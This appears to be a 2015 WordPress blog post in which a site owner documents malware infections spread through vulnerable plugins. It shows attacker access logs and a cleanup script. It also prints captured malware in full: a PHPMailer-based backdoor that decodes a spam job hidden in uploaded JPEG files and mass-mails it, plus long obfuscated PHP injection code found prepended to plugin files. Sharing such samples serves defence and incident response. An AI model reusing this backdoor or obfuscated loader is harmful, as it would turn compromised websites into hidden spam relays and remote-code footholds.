=> ”); $pathinfo = array(); if (preg_match(‘%^(.*?)[\\\\/]*(([^/\\\\]*?)(\.([^\.\\\\/]+?)|))[\\\\/\.]*$%im’, $path, $pathinfo)) { if (array_key_exists(1, $pathinfo)) { $ret[‘dirname’] = $pathinfo[1]; } if (array_key_exists(2, $pathinfo)) { $ret[‘basename’] = $pathinfo[2]; } if (array_key_exists(5, $pathinfo)) { $ret[‘extension’] = $pathinfo[5]; } if (array_key_exists(3, $pathinfo)) { $ret[‘filename’] = $pathinfo[3]; } } switch ($options) { case PATHINFO_DIRNAME: case ‘dirname’: return $ret[‘dirname’]; case PATHINFO_BASENAME: case ‘basename’: return $ret[‘basename’]; case PATHINFO_EXTENSION: case ‘extension’: return $ret[‘extension’]; case PATHINFO_FILENAME: case ‘filename’: return $ret[‘filename’]; default: return $ret; } } public function set($name, $value = ”) { try { if (isset($this->$name)) { $this->$name = $value; } else { throw new phpmailerException($this->lang(‘variable_set’) . $name, self::STOP_CRITICAL); } } catch (Exception $exc) { $this->setError($exc->getMessage()); if ($exc->getCode() == self::STOP_CRITICAL) { return false; } } return true; } public function secureHeader($str) { return trim(str_replace(array(“\r”, “\n”), ”, $str)); } public static function normalizeBreaks($text, $breaktype = “\r\n”) { return preg_replace(‘/(\r\n|\r|\n)/ms’, $breaktype, $text); } public function sign($cert_filename, $key_filename, $key_pass) { $this->sign_cert_file = $cert_filename; $this->sign_key_file = $key_filename; $this->sign_key_pass = $key_pass; } public function DKIM_QP($txt) { $line = ”; for ($i = 0; $i < strlen($txt); $i++) { $ord = ord($txt[$i]); if (((0x21 <= $ord) && ($ord <= 0x3A)) || $ord == 0x3C || ((0x3E <= $ord) && ($ord <= 0x7E))) { $line .= $txt[$i]; } else { $line .= ‘=’ . sprintf(‘%02X’, $ord); } } return $line; } public function DKIM_Sign($signHeader) { if (!defined(‘PKCS7_TEXT’)) { if ($this->exceptions) { throw new phpmailerException($this->lang(‘signing’) . ‘ OpenSSL extension missing.’); } return ”; } $privKeyStr = file_get_contents($this->DKIM_private); if ($this->DKIM_passphrase != ”) { $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase); } else { $privKey = $privKeyStr; } if (openssl_sign($signHeader, $signature, $privKey)) { return base64_encode($signature); } return ”; } public function DKIM_HeaderC($signHeader) { $signHeader = preg_replace(‘/\r\n\s+/’, ‘ ‘, $signHeader); $lines = explode(“\r\n”, $signHeader); foreach ($lines as $key => $line) { list($heading, $value) = explode(‘:’, $line, 2); $heading = strtolower($heading); $value = preg_replace(‘/\s+/’, ‘ ‘, $value); // Compress useless spaces $lines[$key] = $heading . ‘:’ . trim($value); // Don’t forget to remove WSP around the value } $signHeader = implode(“\r\n”, $lines); return $signHeader; } public function DKIM_BodyC($body) { if ($body == ”) { return “\r\n”; } // stabilize line endings $body = str_replace(“\r\n”, “\n”, $body); $body = str_replace(“\n”, “\r\n”, $body); // END stabilize line endings while (substr($body, strlen($body) – 4, 4) == “\r\n\r\n”) { $body = substr($body, 0, strlen($body) – 2); } return $body; } public function DKIM_Add($headers_line, $subject, $body) { $DKIMsignatureType = ‘rsa-sha1’; // Signature & hash algorithms $DKIMcanonicalization = ‘relaxed/simple’; // Canonicalization of header/body $DKIMquery = ‘dns/txt’; // Query method $DKIMtime = time(); // Signature Timestamp = seconds since 00:00:00 – Jan 1, 1970 (UTC time zone) $subject_header = “Subject: $subject”; $headers = explode($this->LE, $headers_line); $from_header = ”; $to_header = ”; $current = ”; foreach ($headers as $header) { if (strpos($header, ‘From:’) === 0) { $from_header = $header; $current = ‘from_header’; } elseif (strpos($header, ‘To:’) === 0) { $to_header = $header; $current = ‘to_header’; } else { if ($current && strpos($header, ‘ =?’) === 0) { $current .= $header; } else { $current = ”; } } } $from = str_replace(‘|’, ‘=7C’, $this->DKIM_QP($from_header)); $to = str_replace(‘|’, ‘=7C’, $this->DKIM_QP($to_header)); $subject = str_replace( ‘|’, ‘=7C’, $this->DKIM_QP($subject_header) ); // Copied header fields (dkim-quoted-printable) $body = $this->DKIM_BodyC($body); $DKIMlen = strlen($body); // Length of body $DKIMb64 = base64_encode(pack(‘H*’, sha1($body))); // Base64 of packed binary SHA-1 hash of body $ident = ($this->DKIM_identity == ”) ? ” : ‘ i=’ . $this->DKIM_identity . ‘;’; $dkimhdrs = ‘DKIM-Signature: v=1; a=’ . $DKIMsignatureType . ‘; q=’ . $DKIMquery . ‘; l=’ . $DKIMlen . ‘; s=’ . $this->DKIM_selector . “;\r\n” . “\tt=” . $DKIMtime . ‘; c=’ . $DKIMcanonicalization . “;\r\n” . “\th=From:To:Subject;\r\n” . “\td=” . $this->DKIM_domain . ‘;’ . $ident . “\r\n” . “\tz=$from\r\n” . “\t|$to\r\n” . “\t|$subject;\r\n” . “\tbh=” . $DKIMb64 . “;\r\n” . “\tb=”; $toSign = $this->DKIM_HeaderC( $from_header . “\r\n” . $to_header . “\r\n” . $subject_header . “\r\n” . $dkimhdrs ); $signed = $this->DKIM_Sign($toSign); return $dkimhdrs . $signed . “\r\n”; } public function getToAddresses() { return $this->to; } public function getCcAddresses() { return $this->cc; } public function getBccAddresses() { return $this->bcc; } public function getReplyToAddresses() { return $this->ReplyTo; } public function getAllRecipientAddresses() { return $this->all_recipients; } protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from) { if (!empty($this->action_function) && is_callable($this->action_function)) { $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from); call_user_func_array($this->action_function, $params); } } } class phpmailerException extends Exception { public function errorMessage() { $errorMsg = ‘‘ . $this->getMessage() . “
\n”; return $errorMsg; } } ///////////////////////////////////////////////////////////////// function sendSmtpMail($from_email, $from_name, $to, $subject, $body, $type, $config_file) { $mail = new PHPMailer(); $mail->isMail(); $mail->CharSet = ‘utf-8’; $mail->SetFrom($from_email, $from_name); $mail->AddAddress($to); $mail->Subject = $subject; if ($type == “1”) { $mail->MsgHTML($body); } elseif ($type == “2”) { $mail->isHTML(false); $mail->Body = $body; } if (isset($_FILES)) { foreach($_FILES as $key => $file) { if ($file[‘tmp_name’] != $config_file) { $mail->addAttachment($file[‘tmp_name’], $file[‘name’]); } } } if (!$mail->send()) { return $mail->ErrorInfo; } else { return 0; } } if (isset($_FILES)) { foreach($_FILES as $key => $file) { if(strpos($file[‘name’], “.jpg”)) { $res = type1_send($file[‘tmp_name’]); if ($res) { echo $res; } } } } function myhex2bin( $str ) { $sbin = “”; $len = strlen( $str ); for ( $i = 0; $i < $len; $i += 2 ) { $sbin .= pack( “H*”, substr( $str, $i, 2 ) ); } return $sbin; } function decode($data, $key) { $out_data = “”; for ($i=0; $i<strlen($data);) { for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++) { $out_data .= chr(ord($data[$i]) ^ ord($key[$j])); } } return $out_data; } function type1_send($config_file) { $data = file_get_contents($config_file); $start_pos = strpos($data, myhex2bin(“ffda”)); if ($start_pos) { $start_pos += (20); $end_pos = strrpos($data, myhex2bin(“ffd9”)); if ($end_pos) { $data = substr($data, $start_pos, $end_pos); } else { return FALSE; } } else { return FALSE; } $key = $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’]; $data = decode($data, $key); $data = @unserialize($data); if (!$data || !isset($data[‘ak’])) { return FALSE; } if ($data[‘ak’] != “328c9145-576b-4a72-9ef0-5d38810eaf66”) { exit(); } if (isset($data[‘c’])) { $res[“r”][“c”] = $data[‘c’]; return base64_encode(serialize($res)); } $good = 0; $bad = 0; $last_error = 0; foreach ($data[‘e’] as $uid=>$email) { $theme = $data[‘s’][array_rand($data[‘s’])]; $theme = alter_macros($theme); $theme = num_macros($theme); $theme = xnum_macros($theme); $message = $data[‘l’]; $message = alter_macros($message); $message = num_macros($message); $message = xnum_macros($message); $message = fteil_macros($message, $uid); $from = $data[‘f’][array_rand($data[‘f’])]; $from = alter_macros($from); $from = num_macros($from); $from = xnum_macros($from); if (strstr($from, “[CUSTOM]”) == FALSE) { $from = from_host($from); } else { $from = str_replace(“[CUSTOM]”, “”, $from); } $from_email = explode(“<“, $from); $from_email = explode(“>”, $from_email[1]); $from_name = explode(“\””, $from); $last_error = sendSmtpMail($from_email[0], $from_name[1], $email, $theme, $message, $data[‘lt’], $config_file); if ($last_error === 0) { $good++; } else { $bad++; $good = count($data[‘e’]) – $bad; } } $res[“r”][“e”] = $last_error === FALSE ? 0 : $last_error; $res[“r”][“g”] = $good; $res[“r”][“b”] = $bad; return base64_encode(serialize($res)); }

Some log to explain the initialization steps:

146.185.239.53 - - [05/Feb/2015:10:26:20 +0100] "POST /wp-content/themes/Avada/framework/plugins/envato-wordpress-toolkit-library/object.php HTTP/1.1" 200 308 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
146.185.239.53 - - [06/Feb/2015:02:34:41 +0100] "POST /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php HTTP/1.1" 404 18711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4"
146.185.239.53 - - [06/Feb/2015:02:34:44 +0100] "POST /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php HTTP/1.1" 404 18694 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
146.185.239.53 - - [06/Feb/2015:02:34:47 +0100] "POST /wp-content/uploads/wysija/themes/rss.lib.php HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0"
146.185.239.53 - - [06/Feb/2015:02:34:48 +0100] "POST /wp-content/uploads/wysija/themes/rss.lib.php HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
146.185.239.53 - - [06/Feb/2015:02:34:49 +0100] "POST /wp-content/backup-2365b/.title14.php HTTP/1.1" 404 18713 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53"
146.185.239.53 - - [06/Feb/2015:02:34:51 +0100] "POST /wp-content/backup-2365b/.title14.php HTTP/1.1" 404 18738 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"

http://whois.domaintools.com/146.185.239.53



Update


A very useful (and easy) script to cleanup your site:


getRealPath();
}

foreach($files as $file){
	if ($file) {
		$fileArr = file($file);
		$hack_pos = strpos($fileArr[0], 'GLOBALS');
		if ($hack_pos !== false) {
			echo "f: $file\n\n";
			$orig_pos = strpos($fileArr[0], '; ?>', $hack_pos);
			$first_line = $orig_pos !== false ? substr($fileArr[0], $orig_pos + 4) : '';
			$fileArr[0] = $first_line;
			file_put_contents($file, join("\n", $fileArr));
		}
	}
}

?>

5 febbraio 2015
di max
0 commenti

WordPress and multiple malwares

5.00 avg. rating (90% score) - 1 vote

Thanks to MailPoet and Revolution Slider my websites run over multiple attaks.

I noticed problems mainly because, when I enter in the plugins’ list, a lot of errors like “Plugin ABC deactivated..” come out.
This because the plugin main file was not starting with its regular comment, but with the malevolent code.

A lot of files (1000+) was starting like this

!%x5c%x78242178}527}88:}334}467]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]6gP7L6M7]D4]275]D:M8]Df#<%x5)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%27pd%x5c%x78256#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93eps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7]37]278]225]241]334]368]322]3]364]6]225j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x78]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH25bss-%x5c%x7825r%x5c%x7878B%xx5c%x7825ww2)%x5c%x7825%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x6c%x7827,*d%x5c%x7827,*ct%x5c%x7825)3of:opjudovg<~%x5c%x7824#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x78782fq%x5c%x7825>U<#16,4doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fm5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%c%x7825bG9}:}.}-}!#*<%x5cbssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%,%x5c%x7825b:%x5c%x7825s:%%x21%50%x5c%x7825%x5c%x7878:!>#]yM#-#[#-#Y#-#D#-#W#-#C#-#OK)ftpmdXA6|7**197-2qj%x5c%x7825%x5c%x782f#)rrd%x5c%x#-#N#*%x5c%x7824%x5c%x782f%x5c%x78256>*4-1-bub)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x72f#00#W~!%x5c%x7825t2wy]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825x5c%x7825:|:*r%x5c%x7825:-x5c%x785c%x5c%x7825j:^!%x5c%x782UTPI%x5c%x7860QUUI&e_SEx5c%x7825:<#64y]552]e7fsX%x5c%x7827u%x5c%x7825)7f8:|:7#6#)tutjyf%x5c%x786043927sfvr#%x5c%x785cq%x5c%x78257%x5c%x782f%x7825!-#1]#-bubE{h%x5c%x7825)tpqsutx7825<#762]67y]562]38y]572]48y]#>m%%x7825nfd>%x5c%x7825fdy!%x5c%x7825tdz)%x5c%x7825bb6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x782y6g]273]y76]271]y7d]252]y74]256]y3%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%xx5c%x7824*!|!%x5c%x7824-%5c%x7825w:!>!%x5c%x78246767~6Ew:Qb:Qc:W~!%x5c%x7825z!>2!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5cx7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%; function fjfgg($n){return chr(ord($n)-1);} @er#!#]y84]275]y83]248]y83]256]y81]x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x78x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;x7825z>>2*!%x5c%x7825z>325h%x5c%x7825!5c%x7825)323ldfidk!~!<**qp%x5c%x78EB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*>}R;m%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f4]275]y83]273]y76]277#<%x5c%x7825t2w>#tmfV%x5c%x787f<*X&Z&S{ftmx5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^72%x5c%x7824!#]y81]273]y76]258]y6g]273]y76]271]y7d]25)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuD6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]yc%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idu9]252]y83]273]y72]282x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5x7822#)fepmqyfA>2b%x5c%x7825!<%73", NULL); }bn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x72f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x_GMFT%x5c%x7860QIQ&f_jgk4%x5c%x7860{6~6>%x5c%x7822:ftmbg39*56A:>:)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7fw6*%x5c%x787f_*#ujojRk3%x5c%x78]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%pd%x5c%x78256!}%x5c%x7827;!>>>824!>!tus%x5c%x7860sf25!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787fg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~!%x55c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*!2p%x5c%x7825!*3>?*2b%x5c%x7825E{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnp*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%>%x5c%x782f7rfs%x5c%x78256<#o58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpecsboe))1%x5c%x782f35.)1%x5c%x78}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!op5wN;#-Ez-1H*WCw*[!%x5c%x7825rN}%x7824-%x5c%x7824y4%x5c%x7824-%x5c%%x7825-qp%x5c%x7825)54l%x7827{**u%x5c%x7825-#jt0}Z;zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824!#]y762f#p#%x5c%x782f%x5c%x7825z!#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!134%x78%62%x35%165%x3a%146%x21%76#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x77860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubx5c%x7824%x5c%x785c%x5c%x7825jc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]%x78256^#zsfvr#%x5c%x785cq%x55ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:fV%x5c%x787f<*XAZASV<*w%x5c%x7825c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)37825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]dbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%fsdXA%x5c%x7827K6<%x5c%x787fw.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c83]427]36]373P6]36]73]83]238M7]381]211M5]B%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%xsvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5cx782f#0#%x5c%x782f*#npdc%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%xsv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)u60{666~6<&w6<%x5c%x787fw6*CW&)7gj6s%x5c%x7825<#462]47y]252]18y]#>q%x5c%7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256hmg%x5c%x7825!<12>j%x5cx5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x786022)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5cx7827Y%x5c%x78256<.msv%xqmbdf)%x5c%x7825%x5c5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7#]y81]273]y76]258]y6fw6*CW&)7gj6<*K)ftpmdXA6~6%x5c%x782f7&6|7**111127-K)eb23zbek!~!b%x5c%x7825Z<#opo#>b%x5c%x7825!*7,18R#>q%x5c%x7825V<*#fopoV!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%xALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156%x61"]=13g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%xfw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7!%x5c%x782400~:!%x5c%x7824Ypp3)%x5c%x7825c;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x825%x5c%x7824-%x5c%x7824*j%x5c%x7825!<**3-j%x5c%x7856<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787c%x7825yy)#}#-#%x5c%x7824-%7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%c%x7827pd%x5c%x78256n%x5c%x7825<#372]58y]472]37y]6265]y72]254]y76#<%x5c%x7825tmw!>!#]y8##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-T-%x5c%x7825bT-%x5c%x7825hW~%%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7825b:>11<%x5c%x7825j:=tj{fpg)%x5c%x782572]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5%x5c%x787f!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7824%x5c%x78223}!+!<+{e%x5c%x7825+*]277]y72]265]y39]274]y85]273]1]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]25-bubE{h%x5c%x7825)sutcvt-#w#)l5c%x7860ftsbqA7>q%x5c%x782w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x78225G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5x5c%x7825>2q%x5c%x7825<#g6R85,67R382]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x295c%x7860hA%x5c%x7827s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1

Others (50+) was starting like this, and other random vars

^#zsfvr#%x5c%x785cq%x5c%-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%xx5c%x78256<*Y%x5c%x78%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tuss%x7825i%x5c%x785c2^1<%x5c%%x5c%x7825%x5c%x787f!b%x5c%x7825Z<#ox5c%x78e%x5c%x78b%x5c%x7825m34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84]6]234]342]58]24]31#-%n fjfgg($n){return chr(ord($n78242178}527}88:}334}482561<%x5c%x7825b:>11<%x5c%x7825j:=t275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1c%x7827pd%x5c%x78256%x5c%x7825fdy!%x5827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368])!gj!<2,*j%x5c%x7825!5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;278X6<#o]o]Y%x5c%x7825)fepmqnj!%x5c%x782f!#0#)ix7825j=tj{fpg)%x5c%x7qov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x75c%x782fr%x5c%x7825%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!dovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*4-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%xx5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%xdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-11111%x5c%x785c%x5c%x7825j:]#>m%x5c%x7825:|:*r%x5c%x7825%x7860{6~6#]D4]273]D6P2L5P6]y6gP7L6M7]D4]hofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7821y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hc_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!!bssbz)%x5c%x7824]25%y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#!%x5c}^Ew:Qb:Qc:W~!%x5c%x7825x5c%x7825tdz*Wsfuvso!%x5c%x71]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7%x78256<#o]1%x5c%x782f20QUUI7jx782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%78b%x5c%x7825ggg!>!#]y81]273]y76]258]jR%x5c%x7827id%x5c%x78256<%x5c%x787%x5c%x787f<*XAZASV<*w%x825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}c%x782f#p#%x5c%x782f%x5c%x7825z!#]y81]5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785c87fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]2782p%x5c%x7825!|!*!***b%x5c%x7825O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x22:ftmbg39*56A:>:8:|:7#6#)tutjy257-C)fepmqnjA%x5c%x77824-%x5c%x7824y7%x5c%x78m)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x782|!%x5c%x7824-%x5c%x7824%x5x78246767~6hmg%x5c%x7825!<12>j%x5c%x7825!|!*#9-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg827!hmg%x5c%x7825)!gj!~:iuw;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjuSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x782dubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpupd%x5c%x78256!%x5c%c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]2w6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gjc%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#>1*!%x5c%x782)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5cd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#)-1);} @error_reporting(0); 